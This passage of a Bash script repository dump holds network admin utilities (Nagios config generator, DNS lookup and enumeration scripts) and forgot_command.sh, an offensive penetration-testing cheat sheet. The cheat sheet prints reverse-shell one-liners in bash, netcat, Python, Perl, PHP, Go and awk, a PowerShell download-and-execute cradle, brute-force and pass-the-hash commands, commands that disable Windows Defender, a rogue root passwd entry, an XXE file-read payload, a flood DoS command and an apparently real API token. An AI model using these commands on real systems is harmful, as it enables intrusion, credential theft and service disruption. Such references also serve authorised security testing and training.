 33 | 	-H : Define the hostname to monitor
 34 | 	-i : Set the IPv4 address of the server to monitor
 35 | 	-t : Define the location of the template file
 36 | 	-r : Restarts the Nagios service
 37 | 
 38 |     EXAMPLES:
 39 |         $0 -H dc01.domain.com -r
 40 |         # This example create a Nagios Core monitoring file for dc01.domain.com in /usr/local/nagios/etc/objects/windows_servers/dc01.domain.com.cfg and restarts the Nagios service
 41 | 
 42 |         $0 -H dhcp.domain.com -i 10.20.11.67 -r
 43 |         # This example create a Nagios Core monitoring file for dhcp.domain.com in /usr/local/nagios/etc/objects/windows_servers/dhcp.domain.com.cfg and restarts the Nagios service
 44 | 	 
 45 |         $0 -H files.domain.com -i 10.20.44.5 -t /usr/local/nagios/etc/objects/windows_servers/windows_template.cfg.orig
 46 | 	  # This example create a Nagios Core monitoring file for files.domain.com in /usr/local/nagios/etc/objects/windows_servers/files.domain.com.cfg
 47 | 	    
 48 | "
 49 | 
 50 | IPV4=$(dig +short $DNSNAME A | head -n 1)
 51 | 
 52 | 
 53 | function allow_ctrlc {
 54 | 
 55 | 	# Allow Ctrl+C to stop execution
 56 | 	trap '
 57 | 	  trap - INT # restore default INT handler
 58 | 	  kill -s INT "$$"
 59 | 	' INT
 60 | 
 61 | }  # End function allow_ctrlc
 62 | 
 63 | 
 64 | function print_usage {
 65 | 
 66 | 	printf "$USAGE\n" >&2
 67 | 	exit 1
 68 | 
 69 | }  # End function print_usage
 70 | 
 71 | 
 72 | function validate_ipv4 {
 73 | 	printf "[*] Verifying $IPV4 value \n"
 74 | 	IPV4REGEX="^[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}$"
 75 | 	if [[ "$IPV4" =~ "$IPV4REGEX" ]] || IPERROR="Valid IP subnet was not defined. For more help execute '$0 -h' \n"; then
 76 | 		if [ ! "$IPERROR" ]; then
 77 | 			printf "[x] A valid network value was not defined, you entered $IPV4. Use -h for help info. \n"
 78 | 			exit 1
 79 | 		fi
 80 | 	fi
 81 | 
 82 | }  # End function validate_ipv4
 83 | 
 84 | 
 85 | function get_hostname {
 86 | 
 87 | 	if [ -z $DNSNAME ]; then
 88 | 		printf "[?] Enter the Windows Server's hostname or FQDN you wish to monitor: "
 89 | 		read DNSNAME
 90 | 	fi
 91 | 
 92 | 	if [ -z $DNSNAME ]; then
 93 | 		exit 1
 94 | 	fi
 95 | 
 96 | 	LOWERCASE=$(printf $DNSNAME | tr '[:upper:]' '[:lower:]')
 97 | 	FILENAME=$(printf $TEMPLATEFILE | tr "/" "\n" | tail -n 1)
 98 | 	DESTINATION=$(printf $TEMPLATEFILE | sed "s|$FILENAME|$LOWERCASE.cfg|")
 99 | 
100 | }
101 | 
102 | 
103 | function verify_ipaddress {
104 | 
105 | 	printf "[?] What is the IP Address? \n Press ENTER to keep the value $IPV4 : "
106 | 	read IPADDRESS
107 | 	
108 | 	if [ -z "$IPADDRESS" ]; then
109 | 		IPV4=$(printf $IPADDRESS)
110 | 	fi
111 | 
112 | 	if [ -z $IPADDRESS ]; then
113 | 		exit 1
114 | 	fi
115 | 
116 | }
117 | 
118 | 
119 | function verify_changes {
120 | 
121 | 	printf "[*] The below values are going to be set for this server \n"
122 | 	printf "[i]   Hostname: $DNSNAME \n"
123 | 	printf "[i]   IP Address: $IPV4 \n"
124 | 	printf "[i]   Alias: $LOWERCASE \n"
125 | 	printf "[i]   File Path: $DESTINATION \n"
126 | 	read -p "[*] Press [ENTER] key to continue "
127 | 
128 | }
129 | 
130 | 
131 | function create_cfg {
132 | 
133 | 	sed "s|localhost|$LOWERCASE|g; s|winserver|$LOWERCASE|g; s|hplj2605dn|$LOWERCASE|g; s|HP LaserJet 2605dn|$DNSNAME|g; s|My Windows Server|$DNSNAME|g; s|192.168.1.2|$IPV4|g"  "$TEMPLATEFILE" > "$DESTINATION"
134 | 
135 | }
136 | 
137 | function restart_nagios_service {
138 | 
139 | 	TEST=$(/usr/local/nagios/bin/nagios -v /usr/local/nagios/etc/nagios.cfg)
140 | 	RESULT=$(echo $TEST | grep "Things look okay - No serious problems were detected during the pre-flight check")
141 | 	
142 | 	if [ -z "$RESULT" ]; then
143 | 		printf "[x] There is an issue with your current Nagios configuration \n"
144 | 		/usr/local/nagios/bin/nagios -v /usr/local/nagios/etc/nagios.cfg
145 | 	else
146 | 		if [ "$RESTARTSERVICE" == "True" ]; then
147 | 			systemctl restart nagios.service && systemctl status nagios.service
148 | 		else
149 | 			printf "[*] You will need to restart the nagios service to apply your changes. \n[i]\tsystemctl restart nagios.service\n"
150 | 		fi
151 | 	fi
152 | 		
153 | }
154 | 
155 | 
156 | 
157 | while [ ! -z "$1" ]; do
158 | 	case "$1" in
159 | 		-H)
160 | 		  shift
161 | 			DNSNAME=$1
162 | 			;;
163 | 		-i)
164 | 			shift
165 | 			IPV4=$1
166 | 			;;
167 | 		-t)
168 | 			shift
169 | 			TEMPLATEFILE=$1
170 | 			;;
171 | 		-r)
172 |                         shift
173 |                         RESTARTSERVICE="True"
174 |                         ;;
175 | 		*)
176 | 			print_usage
177 | 			;;
178 | 	esac
179 | shift
180 | done
181 | 
182 | 
183 | 
184 | allow_ctrlc
185 | get_hostname 
186 | get_ipaddress
187 | verify_changes
188 | create_cfg
189 | restart_nagios_service
190 | 


--------------------------------------------------------------------------------
/cve20063392.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/tobor88/Bash/d85ae7d3c5bf9db82797fafa2d0c40ca27babb17/cve20063392.png


--------------------------------------------------------------------------------
/dnslookup.sh:
--------------------------------------------------------------------------------
  1 | #!/bin/bash
  2 | # This command is meant to easily perform a dns lookup for all hosts in a subnet range
  3 | 
  4 | 
  5 | IPV4_REGEX="^[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}$ "
  6 | USAGE="Syntax: dnslookup [-h] -i <network> [-s <int32 starting port>] [-e <int32 ending port>]
  7 | 
  8 | OsbornePro dnslookup 2.3 ( https://osbornepro.com )
  9 | 
 10 | USAGE: dnslookup -i [network <string format is #.#.#>] 
 11 | 
 12 |     OPTIONS:
 13 |         -h : Displays the help information for the command.
 14 | 	-i : Set the network subnet to perform the dns lookups on
 15 | 	-s : Set the starting IP address to begin the lookups from
 16 | 	-e : Set the last IP Address to lookup
 17 | 
 18 |     EXAMPLES:
 19 |           dnslookup -i 192.168.0 
 20 |             # This example performs a dns lookup from 192.168.0.1 to 192.168.0.254
 21 | 
 22 |           dnslookup-i 192.168.0 -s 10
 23 |             # This example performs a dns lookup from 192.168.0.10 to 192.168.0.254
 24 | 
 25 | 	  dnslookup -i 192.168.0 -s 1 -e 10
 26 | 	    # This example performs a dns lookup from 192.168.0.1 to 192.168.0.10
 27 | 	    
 28 | "
 29 | 
 30 | 
 31 | function allow_ctrl {
 32 | 
 33 | 	# Allow Ctrl+C to kill dnslookup
 34 | 	trap '
 35 | 	  trap - INT # restore default INT handler
 36 | 	  kill -s INT "$$"
 37 | 	' INT
 38 | 
 39 | }  # End function allow_ctrl
 40 | 
 41 | 
 42 | function print_usage {
 43 | 	# Prints the commands help information
 44 | 	printf "$USAGE\n" >&2
 45 | 	exit 1
 46 | 
 47 | }  # End function print_usage	
 48 | 
 49 | 
 50 | function validate_start {
 51 | 
 52 | 	# Validate parameter $START is an integer between 1 and 254
 53 | 	if [ -z "$starting" ]; then
 54 | 		START=1
 55 | 	elif [ "$starting" -lt 255 ] && [ "$starting" -ge 1 ] || ERROR="Start parameter needs to be an integer between 1 and 254"; then
 56 | 		if [ ! $ERROR ]; then
 57 | 			START=$starting
 58 | 		else
 59 | 			printf "[x] $ERROR\n"
 60 | 			exit 1
 61 | 		fi
 62 | 	fi		
 63 | }  # End function validate_start
 64 | 
 65 | 
 66 | function validate_end {
 67 | 
 68 | 	# Validate parameter $END is an integer between $START and 254
 69 | 	if [ -z "$end" ]; then
 70 | 		END=254
 71 | 	elif [ "$end" -lt 255 ] && [ "$end" -gt "$starting" ] || ERROR="End parameter needs to be an integer between the value of positional parameter two and 254"; then
 72 | 		if [ ! $ERROR ]; then
 73 | 			END=$end
 74 | 		else
 75 | 			printf "[x] $ERROR\n"
 76 | 			exit 1
 77 | 		fi
 78 | 	fi
 79 | 
 80 | }  # End function validate_end
 81 | 
 82 | 
 83 | function validate_ipv4 {
 84 | 
 85 | 	# Validate first parameter was defined correctly
 86 | 	if [[ "$ipv4" =~ "$IPV$_REGEX" ]] || ERROR="Valid IP subnet was not defined. For more help execute 'dnslookup -h' Example Value: 172.16.32 "; then
 87 | 		if [ -n "$ERROR" ]; then
 88 | 			printf "[x] $ERROR\n"
 89 | 			exit 1
 90 | 		fi
 91 | 	fi
 92 | 
 93 | }  # End function validate_ipv4
 94 | 
 95 | 
 96 | function execute_dnslookup {
 97 | 
 98 | 	# Begin DNS Lookups
 99 | 	printf "%s\n---------------------------------------------------"
100 | 	printf "%s\n| IP Address             |         FQDN's         |"
101 | 	printf "%s\n---------------------------------------------------%s\n"
102 | 	
103 | 	for i in $(seq $START $END); do 
104 | 		unset HOSTSNAME 2> /dev/null
105 | 		
106 | 		THEIP="$ipv4.$i"
107 | 		HOSTSNAME=$(host "$THEIP" | awk '{print $5}')
108 | 
109 | 		if [ $HOSTSNAME != "3(NXDOMAIN)" ]; then
110 | 			echo "$THEIP             | $HOSTSNAME"
111 | 		fi
112 | 	done 
113 | 
114 | }  # End function execute_dnslookup
115 | 
116 | 
117 | while [ ! -z "$1" ]; do
118 | 	case "$1" in
119 | 		-i) 
120 | 			shift
121 | 		   	ipv4=$1
122 | 			;;
123 | 		-s) 
124 | 			shift
125 | 		   	starting=$1
126 | 			;;
127 | 		-e) 
128 | 			shift
129 | 		   	end=$1
130 | 			;;
131 | 		*) 
132 | 			print_usage
133 | 			;;
134 | 	esac
135 | shift
136 | done
137 | 
138 | allow_ctrl
139 | validate_start
140 | validate_end
141 | validate_ipv4
142 | execute_dnslookup
143 | 


--------------------------------------------------------------------------------
/enablespoofing.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | # I place this script in /usr/local/sbin/enablespoofing.
 4 | # This allows your Linux system to act as a router by forwarding traffic. Then it allows DNS traffic as well as DNS forwarding
 5 | 
 6 | echo "Enabling port forward"
 7 | echo 1 > /proc/sys/net/ipv4/ip_forward
 8 | 
 9 | echo "Allowing DNS traffic through IP Tables Firewall"
10 | iptables -A INPUT -i eth0 -p udp --dport 53 -j ACCEPT
11 | iptables -A PREROUTING -t nat -i eth0 -p udp --dport 53 -j REDIRECT --to-port 53
12 | 
13 | echo "The below value should be the number 1"
14 | cat /proc/sys/net/ipv4/ip_forward
15 | 
16 | echo "Verify iptables is configured below"
17 | iptables --list
18 | 


--------------------------------------------------------------------------------
/enum_dns_servers.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | 
 4 | USAGE="Syntax: $0 [-h] -d <string domain name> [-s <string dns server name>]
 5 | 
 6 | OsbornePro enum_dns_servers 2.0 ( https://osbornepro.com )
 7 | NOTE: You may need to have the domains local DNS servers configured as your DNS servers for this to work. 
 8 | 	You are also able to manually defined the DNS server to use for your lookup.
 9 | 
10 | USAGE: enum_dns_servers -d <string domain name>
11 | 
12 |     OPTIONS:
13 |         -h : Displays the help information for the command.
14 | 	-d : Set the domain name to enumerate the DNS servers of 
15 | 	-s : Set the DNS server to use to perform the lookups on
16 | 
17 |     EXAMPLES:
18 | 	   enum_dns_servers -d osbornepro.com 
19 | 	   This example returns the dns servers of a domain. Ensure your /etc/resolv.conf server is using the domains local servers.
20 | 
21 | "
22 | 
23 | 
24 | function print_usage {
25 | 
26 | 	printf "$USAGE\n" >&2
27 | 	exit 1
28 | 
29 | }  # End function print_usage
30 | 
31 | 
32 | function allow_ctrlc {
33 | 
34 | 	# Allow Ctrl+C to kill pingsweep
35 | 	trap '
36 | 	  trap - INT # restore default INT handler
37 | 	  kill -s INT "$$"
38 | 	' INT
39 | 
40 | }  # End function allow_ctrlc
41 | 
42 | 
43 | function execute_enum_dns_servers {
44 | 
45 | 	# Begin DNS Server Enumeration
46 | 	echo "-------------------------"
47 | 	echo "|      DNS Servers      |"
48 | 	echo "-------------------------"
49 | 	
50 | 	if test $# -gt 1; then
51 | 		host -4 -t ns "$domain" "$server" | cut -d " " -f4
52 | 	else
53 | 		host -4 -t ns "$domain" | cut -d " " -f4
54 | 	fi
55 | 
56 | }  # End function enum_dns_servers
57 | 
58 | 
59 | while [ ! -z "$1" ]; do
60 | 	case "$1" in
61 | 		-d)
62 | 			shift
63 | 			domain=$1
64 | 			;;
65 | 		-s)
66 | 			shift
67 | 			server=$1
68 | 			;;
69 | 		*)
70 | 			print_usage
71 | 			;;
72 | 	esac
73 | shift
74 | done
75 | 
76 | 
77 | allow_ctrlc
78 | execute_enum_dns_servers
79 | 


--------------------------------------------------------------------------------
/forgot_command.sh:
--------------------------------------------------------------------------------
  1 | #!/bin/bash
  2 | # Sometimes I forget a command if I have not used it in a while. 
  3 | # I made this as a reference in an attempt to save the time it 
  4 | # take to search for what I need to known on the internet or my notes
  5 | # I also added some enum results to save finding nmap enum scripts
  6 | 
  7 | # ssh-tunnels
  8 | if [ "$1" == "ssh-tunnels" ]; then
  9 | 	printf "REMOTE SSH TUNNEL: \nssh -f -N -o "UserKnownHostsFile=/dev/null" -o "StrictHostKeyChecking=no" -R 2222:<compromised host ip>:22 -R 13306:<compromised ip>:3306 kali@<my-ip> -p <port>\n"
 10 | 	printf "LOCAL SSH TUNNEL: \nssh -f -N -L <local port>:<localhost or second target ip>:<remote port> username@<target ip>\n"
 11 | 	printf "DYNAMIC SSH TUNNEL: \nssh -f -N -D <local port> username@ip\n\n"
 12 | 
 13 | # ssh-enum
 14 | elif [ "$1" == "ssh-enum" ]; then
 15 | 	printf "nmap -p <port> --script=ssh2-enum-algos.nse,ssh-auth-methods.nse,ssh-hostkey.nse,ssh-publickey-acceptance.nse,ssh-run.nse,sshv1.nse <ip>\n\n"
 16 | 
 17 | # ssh-conf
 18 | elif [ "$1" == "ssh-conf" ]; then
 19 | 	printf "from=\"<target ip>\", command=\"echo 'This account can only be used for port forwarding'\",no-agent-forwarding,no-X11-forwarding,no-pty ssh-rsa AAA... www-data@target\n\n"
 20 | 	printf "ssh -f -N -o "UserKnownHostsFile=/dev/null" -o "StrictHostKeyChecking=no" -R 2222:<compromised host ip>:22 -R 13306:<compromised ip>:3306 kali@<targetip> -p 22 -i /tmp/.tobor/id_rsa\n\n"
 21 | 
 22 | # ssh-brute
 23 | elif [ "$1" == "ssh-brute" ]; then
 24 | 	printf "hydra -s <port> -l <username> -P /usr/share/wordlists/rockyou.txt <ip> -t <number of threads up to 16> -V ssh\n\n"
 25 | 	printf "medusa -u <username> -P /usr/share/seclists/Passwords/probable-v2-top207.txt -h <ip> -M ssh -n <port>\n\n"
 26 | 
 27 | # telnet-brute
 28 | elif [ "$1" == "telnet-brute" ]; then
 29 | 	printf "hydra -L usernames.txt -P passwords.txt 192.168.2.62 telnet -V\n"
 30 | 	printf "nmap -p 23 --script telnet-brute --script-args userdb=myusers.lst,passdb=mypwds.lst,telnet-brute.timeout=8s <target>\n"
 31 | 	printf "ncrack -U /root/Desktop/user.txt –P /root/Desktop/pass.txt <ip>:<port>\n"
 32 | 	printf "patator telnet_login host=192.168.1.106 inputs='FILE0\\nFILE1' 0=/root/Desktop/user.txt 1=/root/Desktop/pass.txt  persistent=0 prompt_re='Username: | Password:'\n"
 33 | 
 34 | # telnet-enum
 35 | elif [ "$1" == "telnet-enum" ]; then
 36 | 	printf "nmap -p 23 --script=telnet-ntlm-info.nse --script=telnet-encryption.nse <ip>\n"
 37 | 
 38 | # ftp-brute
 39 | elif [ "$1" == "ftp-brute" ]; then
 40 | 	printf "ncrack -U usernames.txt -P passwords.txt ftp://10.10.0.50\n"
 41 | 	printf "patator ftp_login host=10.10.0.50 user=FILE0 password=FILE1 0=usernames.txt 1=passwords.txt\n"
 42 | 	printf "medusa -H hosts.txt -U user.txt -P pass.txt -M ftp -T 1\n"
 43 | 	printf "medusa -M ftp -C userpass.txt\n"
 44 | 	printf "hydra -L user.txt -P pass.txt 192.168.1.108 ftp -V -e nsr\n"
 45 | 
 46 | # smtp-enum
 47 | elif [ "$1" == "smtp-enum" ]; then
 48 | 	printf "nmap -p 25 --script=smtp-commands.nse,smtp-enum-users.nse,smtp-ntlm-info.nse,smtp-open-relay.nse,smtp-strangeport.nse,smtp-vuln-cve2010-4344.nse,smtp-vuln-cve2011-1720.nse,smtp-vuln-cve2011-1764.nse <ip>\n"
 49 | 	printf "smtp-user-enum -M VRFY -U /root/Desktop/user.txt -t 192.168.1.107\n"
 50 | 	printf "ismtp -h <ip>:25 -e /root/Desktop/emaillist.txt\n"
 51 | 
 52 | # dns-enum
 53 | elif [ "$1" == "dns-enum" ]; then
 54 | 	printf "dig axfr @<dns server> <domain>\n"
 55 | 	printf "dnsrecon -d <domain> -t axfr\n"
 56 | 	printf "dnsenum <domain>\n"
 57 | 	printf "host -l <domain name> <dns server address>\n"
 58 | 	printf "nmap --script=dns-zone-transfer -p 53 ns2.megacorpone.com\n"
 59 | 
 60 | # enum-subdomain
 61 | elif [ "$1" == "enum-subdomain" ]; then
 62 | 	printf "dnsrecon -d megacorpone.com -D ~/subdomains.list.txt -t brt\n"
 63 | 	printf "wfuzz -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -H 'Host: FUZZ.domain.com' -u http://<target ip>/ --hh(or some distinguishing value to ignore)\n"
 64 | 	printf "ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -H 'Host: FUZZ.travel.htb' -u http://10.10.10.189 --fw=842\n"
 65 | # tftp-enum
 66 | elif [ "$1" == "tftp-enum" ]; then
 67 | 	printf "nmap -p 69 -sU --script=tftp-enum.nse <ip>\n"
 68 | 
 69 | # pop-enum
 70 | elif [ "$1" == "pop-enum" ]; then
 71 | 	printf "nmap -p 110 --script=pop3-capabilities.nse,pop3-ntlm-info.nse <ip>\n"
 72 | 
 73 | # rpc-enum
 74 | elif [ "$1" == "rpc-enum" ]; then
 75 | 	printf "nmap -p 111 --script=rpcinfo.nse <ip>\n"
 76 | 	printf "nbtscan <ip>-<range>\n"
 77 | 	printf "enum4linux -a <ip>\n"
 78 | 
 79 | # rpcclient
 80 | elif [ "$1" == "rpcclient" ] ; then
 81 | 	printf "srvinfo\n"
 82 | 	printf "enumdomusers\n"
 83 | 	printf "queryuser <username>\n"
 84 | 	printf "querydominfo\n"
 85 | 	printf "getdompwinfo\n"
 86 | 
 87 | # nfs-enum
 88 | elif [ "$1" == "nfs-enum" ]; then
 89 | 	printf "nmap -p 111 --script=nfs*.nse <ip>\n"
 90 | 
 91 | # imap-enum
 92 | elif [ "$1" == "imap-enum" ]; then
 93 | 	printf "nmap -p 143 --script=imap-capabilities.nse,imap-ntlm-info.nse <ip>\n"
 94 | 
 95 | # smb-access
 96 | elif [ "$1" == "smb-access" ]; then
 97 | 	printf "smbmap -u user -p password -d domain.com -H <ip>\n"
 98 | 	printf "python /usr/share/doc/python3-impacket/examples/smbclient.py domain//username:password@target -port <destination port> [-no-pass] \n"
 99 | 	printf "smbclient -U 'domain/username%passwordorhash' //<targetip>/<share> [--pw-nt-hash] [-N|--no-pass]\n"
100 | 
101 | # smb-enum
102 | elif [ "$1" == "smb-enum" ]; then
103 | 	printf "START LISTENER: ngrep -i -d tun0 's.?a.?m.?b.?a.*[[:digit:]]'\nCONNECT TO LISTENER: smbclient -L <ip> -U "" -N\n\n"
104 | 	printf "smblcient -N -U "guest" -L <ip> \n"
105 | 	printf "SAMBA CRY CHECK: nmap --script smb-vuln-cve-2017-7494 --script-args smb-vuln-cve-2017-7494.check-version -p <port> <ip>\n"
106 | 	printf "smbmap -R -H <ip>\n"
107 | 	printf "nmap -p 139,445 --script=smb-os-discovery.nse,smb-mbenum.nse,smb2-capabilities.nse,smb2-security-mode.nse,smb-enum-*.nse,smb-security-mode.nse,smb-protocols.nse,smb-system-info.nse,smb-print-text.nse,smb-vuln-*.nse,smb-ls.nse  <ip>\n"
108 | 
109 | # smb-brute
110 | elif [ "$1" == "smb-brute" ]; then
111 | 	printf "hydra -L usernames.txt -P passwords.txt 192.168.2.66 smb -V -f\n"
112 | 	printf "ncrack –U /root/Desktop/user.txt -P /root/Desktop/pass.txt 192.168.1.118 –p 445\n"
113 | 	printf "medusa -h 192.168.1.118 -U /root/Desktop/user.txt -P /root/Desktop/pass.txt -M smbnt\n"
114 | 
115 | # sql-brute
116 | elif [ "$1" == "sql-brute" ]; then
117 | 	printf "hydra -L usernames.txt -P passwords.txt 192.168.2.66 mysql -V -f\n"
118 | 	printf "hydra -L usernames.txt -P passwords.txt 192.168.2.62 postgres -V\n"
119 | 	printf "nmap -p 445 --script ms-sql-brute --script-args mssql.instance-all,userdb=customuser.txt,passdb=custompass.txt <host>\n"
120 | 	printf "nmap -p 1433 --script ms-sql-brute --script-args userdb=customuser.txt,passdb=custompass.txt <host>\n"
121 | 
122 | # rdp-enum
123 | elif [ "$1" == "rdp-enum" ]; then
124 | 	printf "nmap -p 3389 --script=rdp-enum-encryption.nse,rdp-ntlm-info.nse,rdp-vuln-ms12-020.nse <ip>\n"
125 | 
126 | # ldap-enum
127 | elif [ "$1" == "ldap-enum" ]; then
128 | 	printf "bloodhound-python -d domain.com -u user -p 'Password1' -gc pathfinder.megacorp.local -c all -ns <ip>\n"
129 | 	printf "ldapsearch -h 10.10.10.182 -x -b DC=cascade,DC=local > ldapsearch.txt\n"
130 | 	printf "nmap --script=ldap-search.nse <ip> -p389 -oN ldapsearch.results\n"
131 | 	printf "nmap --script=ldap-rootdse.nse <ip> -p389 -oN ldaprootdes.results\n"
132 | 	printf "python samrdump.py 10.10.10.161\n"
133 | 	printf "python secretsdump.py 10.10.10.161\n"
134 | 	printf "ldapdomaindump -u egotisticalbank\\fsmith -p 'Thestrokes23' -n <ip> <ip>\n"
135 | 	printf "python GetNPUsers.py domain.com/ -usersfile /path/to/user.list -format [john|hashcat] -outputfile hashes.txt -request -dc-ip <dc-ip>\n"
136 | 
137 | # vnc-enum
138 | elif [ "$1" == "vnc-enum" ]; then
139 | 	printf "nmap -p 5800,5900 --sciprt=vnc-info.nse --script=vnc-title.nse <ip>\n"
140 | 
141 | # vnc-brute
142 | elif [ "$1" == "vnc-brute" ]; then
143 | 	printf "hydra -P passwords.txt <ip> vnc -V\n"
144 | 	printf "medusa -h <ip> –u root -P /root/Desktop/pass.txt –M vnc\n"
145 | 	printf "ncrack -V --user root -P /path/to/pass.txt <ip>:5900\n"
146 | 	printf "patator vnc_login host=<ip> password=FILE0 0=/root/Desktop/pass.txt –t 1 –x retry:fgep!='Authentication failure' --max-retries 0 –x quit:code=0\n"
147 | 
148 | # wp-brute
149 | elif [ "$1" == "wp-brute" ]; then
150 | 	printf "wpscan --url http://<ip>/<wp-parent> --usernames wpuser.lst --passwords /usr/share/wordlists/rockyou.txt\n"
151 | 	
152 | # wp-enum
153 | elif [ "$1" == "wp-enum" ]; then
154 | 	printf "wpscan --url http://<ip>/<wp-parent> --enumerate ap,at,cb,dbe --api-token mk7EgXlCt1PQSBUUZpVdMW2ouT2A2nnRe07vF8umYUk -o wpscan.results\n"
155 | 
156 | # pth
157 | elif [ "$1" == "pth" ]; then
158 | 	printf "smbclient -U domain/user%hash:hash -n <netbios name> -W <domain> //<ip>/share$\n"
159 | 	printf "python /usr/share/doc/python3-impacket/examples/wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:<ntlm hash> Administrator@<target>\n"
160 | 	printf "pth-winexe -U administrator%aad3b435b51404eeaad3b435b51404ee:<ntlm hash> //<ip> cmd\n"
161 | 	printf "pth-smbclient //<target ip>/c$ -U <domain>/<username>%aad3b435b51404eeaad3b435b51404ee:<ntlm hash>\n"
162 | 	printf "crackmapexec <ip> -u user -H <hash>\n"
163 | 	printf "xfreerdp /u:admin /d:domain /pth:hash:hash /v:<ip>\n"
164 | 
165 | # windows-firewall
166 | elif [ "$1" == "windows-firewall" ]; then
167 | 	printf "Set-MpPreference -DisableRealtimeMonitoring $true\n"
168 | 	printf "Set-MpPreference -ExclusionPath 'C:\Windows\System32\spool\drivers\color'\n"
169 | 
170 | # hping3
171 | elif [ "$1" == "hping3" ]; then
172 | 	printf "TCP  : hping3 -V -1 -c 1 -p 80 -s 5050 <ip>\n"
173 | 	printf "UDP  : hping3 -V -2 -c 1 -p 80 -s 5051 <ip>\n"
174 | 	printf "SYN  : hping3 -V -S -c 1 -p 80 -s 5052 <ip>\n"
175 | 	printf "ACK  : hping3 -V -A -c 1 -p 80 -s 5053 <ip>\n"
176 | 	printf "FIN  : hping3 -V -F -c -1 -p 80 -s 5054 <ip>\n"
177 | 	printf "XMAS : hping3 -V -M 0 -c 1 -p 80 -UPF -s 5055 <ip>\n"
178 | 	printf "NULL : hping3 -V -Y -c 1 -p 80 -s 5056 <ip>\n"
179 | 	printf "Smurf: hping3 -V -1 --flood -a <ip>\n"
180 | 	printf "DoS  : hping3 -V -1 --flood <ip>\n"
181 | 
182 | # suid
183 | elif [ "$1" == "suid" ]; then
184 | 	printf "find / -perm -u=s -type f 2>/dev/nul\n"
185 | 
186 | # IEX
187 | elif [ "$1" == "IEX" ]; then
188 | 	printf "IEX (New-Object Net.WebClient).downloadString('http://ip/file.txt')\n"
189 | 
190 | # passwd
191 | elif [ "$1" == "passwd" ]; then
192 | 	printf "openssl passwd Passw0rd1\n"
193 | 	printf "echo 'tobor:r6/TCn03QnsGE:0:0:root:/root:/bin/bash' >> malicious_passwd_file\n"
194 | 
195 | # rev-shell
196 | elif [ "$1" == "rev-shell" ]; then
197 | 	printf "nc <ip> <port> -e /bin/bash"
198 | 	printf "OpenBSD Netcat: mkfifo /tmp/tobor; nc <ip> <port> 0</tmp/tobor | /bin/sh>/tmp/tobor 2>&1; rm /tmp/tobor\n"
199 | 	printf "BASH: bash -i >& /dev/tcp/10.0.0.1/4242 0>&1\n"
200 | 	printf "SH: sh -i >& /dev/udp/10.0.0.1/4242 0>&1\n"
201 | 	printf "SOCAT:\n\tATTACK: socat file:\`tty\`,raw,echo=0 TCP-L:4242\n\tTARGET: /tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.0.1:4242\n"
202 | 	printf "PERL: perl -e 'use Socket;$i=\"10.0.0.1\";$p=4242;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -ii\");};'\n"
203 | 	printf "PYTHON: python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",4242));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn(\"/bin/bash\")'\n"
204 | 	printf "PHP: php -r '$sock=fsockopen(\"10.0.0.1\",4242);exec(\"/bin/sh -i <&3 >&3 2>&3\");'\n"
205 | 	printf "RUBY: ruby -rsocket -e'f=TCPSocket.open(\"10.0.0.1\",4242).to_i;exec sprintf(\"/bin/sh -i <&%d >&%d 2>&%d\",f,f,f)'\n"
206 | 	printf "GO: echo 'package main;import\"os/exec\";import\"net\";func main(){c,_:=net.Dial(\"tcp\",\"10.0.0.1:4242\");cmd:=exec.Command(\"/bin/sh\");cmd.Stdin=c;cmd.Stdout=c;cmd.Stderr=c;cmd.Run()}' > /tmp/t.go && go run /tmp/t.go && rm /tmp/t.go\n"
207 | 	printf "AWK: awk 'BEGIN {s = \"/inet/tcp/0/10.0.0.1/4242\"; while(42) { do{ printf \"shell>\" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $\\0 |& s; close(c); } } while(c != \"exit\") close(s); }}' /dev/null\n"
208 | 
209 | # xxe
210 | elif [ "$1" == "xxe" ]; then
211 | 	printf "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n
212 | <!DOCTYPE foo [ <!ENTITY xxe SYSTEM \"file:///etc/passwd\"> ]>\n
213 | <stockCheck><productId>&xxe;</productId></stockCheck>\n"
214 | 
215 | # xp_cmdshell
216 | elif [ "$1" == "xp_cmdshell" ]; then
217 | 	printf "ENABLE XP_CMDSHELL: sp_configure 'show advanced options', '1'\nreconfigure\nsp_configure 'xp_cmdshell', '1' \nreconfigure\n"
218 | 	printf "CREATE USER FOR XP_CMDHSELL: use <database>;\ngo;\ncreate user test for loging test;\ngo\ngrant exec on xp_cmdshell to test;\ngo\n"
219 | 
220 | # Extract ab file contents Android Backup
221 | elif [ "$1" == "extract-ab" ]; then
222 |         printf "( printf \"\\x1f\\x8b\\x08\\x00\\x00\\x00\\x00\\x00\" ; tail -c +25 backup.ab ) |  tar xfvz \n"
223 | fi
224 | 
225 | 


--------------------------------------------------------------------------------
/generate_all_uppercase_lowercase_combos_for_a_word.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | # This is a bash script I use to convert a word into every possible uppercase and lowercase combination
 4 | #
 5 | # EXAMPLE USAGE: 
 6 | # ./generate_all_uppercase_lowercase_combos_for_a_word.sh osbornepro
 7 | # osbornepro
 8 | # osborneprO
 9 | # osbornepRo
10 | # osbornePro
11 | # osbornEpro
12 | # osborNepro
13 | # osboRnepro
14 | # osbOrnepro
15 | # osBornepro......
16 |  
17 | TOUPPER=${1^^}
18 | GETLEN=${#TOUPPER}
19 | 
20 | for ((permutation=0; permutation <= GETLEN; permutation++))
21 | do
22 | 
23 |     for ((i=0; i <= GETLEN; i++))
24 |     do
25 |         lower=${TOUPPER,,}
26 | 
27 |         if [ $permutation -gt 0 ]
28 |         then
